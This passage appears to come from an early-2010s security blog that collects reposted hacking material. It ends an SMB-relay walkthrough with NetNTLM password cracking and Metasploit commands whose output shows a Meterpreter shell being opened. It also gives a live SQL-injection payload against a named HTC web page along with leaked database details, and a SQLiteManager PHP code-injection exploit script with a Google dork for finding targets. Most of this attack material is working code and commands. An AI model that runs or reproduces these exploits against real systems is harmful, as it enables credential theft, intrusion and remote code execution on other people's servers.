 4. Crack the second half with john the ripper to obtain the case insensitive full LM password. Use the netntlm.pl script from the jumbo pack. They can be downloaded from http://www.openwall.com/john/.

C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt
…[TRUNCATED]… Loaded 1 password hash (LM C/R DES [netlm])
WINTER2012 (sqlaccount)
guesses: 1 time: 0:00:00:10 DONE (Mon Nov 26 10:59:56 2012)
c/s: 428962 trying: WINTER204K - WINTER211IA
…[TRUNCATED]

5. Run the same command again to obtain the case-sensitive password.

C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt
 …[TRUNCATED]…
Performing NTLM case-sensitive crack for account: sqlaccount.
guesses: 1 time: 0:00:00:00 DONE (Mon Nov 26 11:01:54 2012)
c/s: 1454 trying: WINTER2012 - winter2012
Use the "--show" option to display all of the cracked passwords reliably
Loaded 1 password hash (NTLMv1 C/R MD4 DES [ESS MD5] [netntlm])
Winter2012 (sqlaccount)
…[TRUCATED]…

6. Start the Metasploit “smb_relay” module to relay authentication to SQL Server 2:
msfconsole use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.101
exploit

7. Configure and execute the “mssql_ntlm_stealer” Metasploit module against SQL Server 1:
  1. msfconsole
    use auxiliary/admin/mssql/mssql_ntlm_stealer
    set USE_WINDOWS_AUTHENT true
    set DOMAIN DEMO
    set USERNAME test
    set PASSWORD Password12
    set RHOST 192.168.1.100
    set RPORT 1433
    Set SMBPROXY 192.168.1.102
    
    msf  auxiliary(mssql_ntlm_stealer) > run
    
    [*] DONT FORGET to run a SMB capture or relay module!
    [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree...
    [*] Received 192.168.1.100:1058 LVA\sqlaccount LMHASH:feefee989
    c0b45f833b7635f0d2ffd667f4bd0019c952d5a NTHASH:8f3e0be3190fee6b
    d17b793df4ace8f96e59d324723fcc95 OS:Windows Server 2003 3790
    Service Pack 2 LM:
    [*] Authenticating to 192.168.1.101 as LVA\sqlaccount...
    [*] AUTHENTICATED as LVA\sqlaccount...
    [*] Connecting to the ADMIN$ share...
    [*] Regenerating the payload...
    [*] Uploading payload...
    [*] Created \saEQcXca.exe...
    [*] Connecting to the Service Control Manager...
    [*] Obtaining a service manager handle...
    [*] Creating a new service...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Sending stage (752128 bytes) to 192.168.1.101
    [*] Closing service handle...
    [*] Deleting \saEQcXca.exe...
    [*] Sending Access Denied to 192.168.1.100:1058 LVA\sqlaccount
    [+] Successfully executed xp_dirtree on 192.168.1.100
    [+] Go check your SMB relay or capture module for goodies!
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf  auxiliary(mssql_ntlm_stealer) >
    [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-26
    11:54:18 -0600


Source: http://www.netspi.com/blog/2012/12/26/executing-smb-relay-attacks-via-sql-server-using-metasploit/





Jan 27, 2013

Update script for Backtrack 5 R3 Tool

I created an update script that updates the tools in your Backtrack 5 R3; try it.

1. Download from https://www.dropbox.com/s/4mkel34ih88dic2/update-script.sh
2. Give it execute permission
chmod +x update-script.sh  


honeypot-setup-script - Setup honeypot on your server in 3 minutes

A script to install and deploy a honeypot automatically and without user interaction.
Currently installs and sets up:
  • kippo
  • dionaea
  • p0f
These will all be installed as system services so running this script once should turn a vanilla install in to a robust honeypot. Aims to use useful and secure defaults. 

Source:  https://github.com/andrewmichaelsmith/honeypot-setup-script/



HTC website was hacked via SQL Injection

If you want to see the information leaked in this incident, please go to the Source.
 
 http://learning-development.htc.com/index.php?op=UserAuthCandidate

 [+] MySQL Injection Double Query Syntax :
 
 {POST} CandidateID=' and(select 1 from(select count(*),concat((select(
concat(0x3d3d3e,0x27,cast(database() as char),0x27,0x7e))
 from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 and '1'='1 &CID='&FName='&Name=' {POST}


 [+] DataBase Version     :   5.0.45
 [+] Current DataBase      :  uniprosi_htc
 [+] Others DB's            :   information_schema, test
 [+] System User            :   unipros_htc@localhost
 
 
 
Source: http://pastehtml.com/view/cqb4o9yuo.html 



SQLiteManager 0Day Remote PHP Code Injection Vulnerability

Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
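Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
Why it helps: with every '.' removed, the submitted database path can no longer carry a file extension such as .php, so the database file created by the request cannot be given a script extension that the web server would execute.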
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
 
def strip_tags(value):
    """Return value with every <...> markup tag removed.

    This is a plain regular-expression strip, not an HTML parser: anything
    between a '<' and the next '>' is dropped, line breaks included.
    """
    tag_pattern = re.compile('<[^>]*?>')
    return tag_pattern.sub('', value)
 
def getDbId(sqliteUrl, myDbName):
    """Look up the id that the page at sqliteUrl lists for the database myDbName.

    The page is fetched with a 120 second timeout and scanned for
    <td class="name_db"> cells. For the first cell whose tag-stripped text
    equals myDbName, the value(s) following "?dbsel=" inside that cell are
    joined and returned. Returns None when the page is empty or no cell
    matches.
    """
    page = urllib2.urlopen(sqliteUrl, None, 120).read()
    if not page:
        return None

    #Every database name cell found in the listing
    cells = re.findall('<td class="name_db">(.*?)</td>', page, re.DOTALL)
    for cell in cells:
        if strip_tags(cell) != myDbName:
            continue
        #Matching row: the id is carried by the cell's ?dbsel= link
        return "".join(re.findall('\?dbsel=(.*?)"', cell, re.DOTALL))
    return None
 
def main():
    """Proof-of-concept driver for the SQLiteManager <=1.2.4 'dbpath' issue.

    Takes the SQLiteManager base URL as the first command-line argument and
    submits a "saveDb" request whose dbpath is a file name ending in .php,
    then looks the new database up by name.

    NOTE(review): the listing is cut off on this page. The second params
    dictionary is built but the request that would send it is not shown.
    """
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'
     
    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        #(only the script's own file name is kept for the usage line)
        filename = argv[0].replace('\\', '/').split('/')[-1]
         
        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()
     
    sqliteUrl = argv[1]    
    myDbName  = "phpinfo"
    myDbFile  = "phpinfo.php"
    #Create Database
    #dbpath is the field the advisory's fix sanitises: here it carries a name
    #with a .php extension.
    #Detection hint: a POST to main.php with action=saveDb whose dbpath ends in
    #a script extension.
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #SQL text that creates a table and inserts one row whose content is a
        #PHP snippet (phpinfo() followed by unlink(__FILE__)).
        #NOTE(review): nothing visible here submits this dictionary.
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                      'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
 
Source: http://packetstormsecurity.com/files/119836 